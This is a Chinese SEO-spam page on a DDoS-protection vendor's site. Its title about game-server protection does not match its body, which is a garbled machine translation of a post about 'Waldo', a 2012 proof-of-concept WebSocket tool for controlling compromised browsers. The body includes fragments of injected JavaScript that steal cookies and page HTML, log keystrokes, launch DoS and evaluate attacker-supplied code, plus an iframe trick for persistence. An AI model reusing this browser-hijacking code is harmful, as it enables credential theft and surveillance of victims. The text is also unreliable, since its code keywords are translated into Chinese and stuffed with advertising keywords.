广东高防_怎么_挪移棋牌高防-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!

QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > CC防护 > 广东高防_怎么_挪移棋牌高防

广东高防_怎么_挪移棋牌高防

小墨安全管家 2021-04-06 20:23 CC防护 89 ℃
DDoS防御

广东高防_怎么_挪移棋牌高防

Waldo是为Black Hat USA 2012编写的概念验证教育演示,展示了开始使用WebSocket是多么容易,因为大多数主流扫瞄器都支持WebSocket。我们在其中添加了一些安全上下文,并演示了攻击者经过WebSockets与受损的扫瞄器WebSocket协议允许用户绕过防火墙之类的安全设备,因为大多数用户不懂这一点,所以不懂怎么处理WebSocket数据帧。在后续文章中,我们将详细描述这些安全含义细节。瓦尔多DemoWaldo是小的,在C++程序的200行下,它与类似的JavaScript小部分通信,受害者.js,DDoS防御,在受损扫瞄器上运行。这是一具特别好的演示,但从设计上来讲并不复杂-它是建立在一具咨询题几个小时。瓦尔多构建在websocketpp服务器之上,websocketpp服务器是一具兼容RFC6455的WebSocket库,并展示了怎么在管道两端用WebSooCts举行编码:经过服务器端C++和JavaScript API扫瞄器演示假定受害者.jsJavascript代码,它监听来自waldo的命令,基本被注入了一具受损的网络佩奇。最好查看完整的屏幕waldo服务器waldo服务器代码很简单,它基于无状态websocketpp的echo_服务器示例。它子类化了一具服务器处理程序,并定义了onu消息回调(我们只实现文本版本,尝试自个儿实现二进制版本),一旦一具完整的websocket框架被调用接收:类waldo_server_处理程序:公共终结点_类型::处理程序{...空消息(connection\u ptr con,websocketpp::message::data\u ptr msg){...}};妥协的扫瞄器那个演示假设Waldo能够访咨询一具基本被破坏的网站受害者.js注入其中。假如你还想让Waldo可以让扫瞄器呈现受损网站的屏幕截图,这么它也应该有截图.js注入它。到确保足本正在运行,即使用户导航到同一域中的另一具页面,我们将带有恶意足本的现有内容挪移到一具躲藏的框架中,接着在另一具框架中重新加载页面。假如服务器有任何类型的反帧对策,如X-Frame-Options或Frame,则此技术将不起作用-巴斯特:假如(窗口.父级&& window.parent.document.getElementById(''u waldo')){返回;}//将内容重新加载到iframe的简单想法,我在// $('body').children().hide();$('').css文件({position:'绝对',DDoS防御,宽度:"100%",高度:'100%',DDoS防御,顶部:0,左:0,边框:0,背景:"#fff"}).attr('src',window.location.href).appendTo('body');接着足本与waldo建立WebSocket连接服务器:假如(窗口中的"WebSocket"){ws=新的WebSocket(url);}或者执行映射到从服务器接收到的命令的预定义函数,或者计算传入的raw JavaScript:从服务器接收函数(五){var输入=解析.JSON(e.数据);操纵台.log("服务器:"+传入.cmd);假如(传入.cmd=="屏幕截图"){发送(数据);}否则假如(传入.cmd=="cookies"){cookie=getCookie();发送(cookie);}否则假如(传入.cmd=="html"){html=getDom();发送(html);}否则假如(传入.cmd=="激活klogger"){假如(window.onkeyup==空){ks='';顶部_waldo.document.onkeyup=klogger;发送("klogger激活");}}否则假如(传入.cmd=="按键"){发送(ks);ks='';}否则假如(传入.cmd=="停用klogger"){window.onkeyup=空;ks='';发送("klogger取消激活");}否则假如(传入.cmd=="崩溃"){崩溃();发送("预备好了(但大概基本死了)");}否则假如(传入.cmd=="dos"){DoS公司(传入.arg1, 传入.arg2);发送("DoS启动");}否则假如(传入.cmd=="自定义JS"){评估(传入.arg1);发送("已执行");}其他{发送("就绪");}}Waldo依靠项和安装Waldo应该能够在大多数Linux平台以及osx上运行瓦尔多.cpp文件:–websocketpp WebSocket library–websocketpp需要Boost才干成功编译。Boost版本1.47.0是推举。加油能够按照本教程所述从源代码处编译,也能够经过您最爱慕的软件包安装工具(如Brew、MacPorts、APT)举行安装,等一次boost已安装,请从github:git克隆https://github.com/zaphoyd/websocketpp.gitmakemake安装后安装websocketpp库,只需下载瓦尔多。齐普,CC防御,提取,回忆一般.mk文件以确保您拥有正确的boost和websocketpp路径,接着键入创造。那儿是一些高级工具,如BeEF和xschef,在扫瞄器开辟方面实现了很丰富的功能,然而我们希翼waldo可以关心那些想要的人在他们的自个儿的.relatedwill你让你奶奶用网络插座?2012年8月15日在"安全实验室"中经过Qualys2018年8月30日在"产品和技术"QSC18虚拟版:安全容器-从构建到部署"产品和技术"2018年8月13日


DDoS防御

当前位置:主页 > CC防护 > 广东高防_怎么_挪移棋牌高防

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119